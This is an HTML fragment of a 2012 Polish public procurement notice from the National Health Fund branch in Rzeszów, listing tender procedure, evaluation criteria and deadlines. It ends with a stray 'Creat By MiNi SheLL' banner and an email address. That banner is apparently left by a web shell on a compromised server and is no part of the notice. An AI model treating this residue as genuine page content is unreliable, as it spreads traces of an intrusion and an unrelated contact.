<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nfz-rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podkarpacki Oddział Wojewódzki Narodowego Funduszu Zdrowia 35-032 Rzeszów, ul. Zamkowa 8, pok. 223.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2012 godzina 10:00, miejsce: Podkarpacki Oddział Wojewódzki Narodowego Funduszu Zdrowia 35-032 Rzeszów, ul. Zamkowa 8, pok. 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com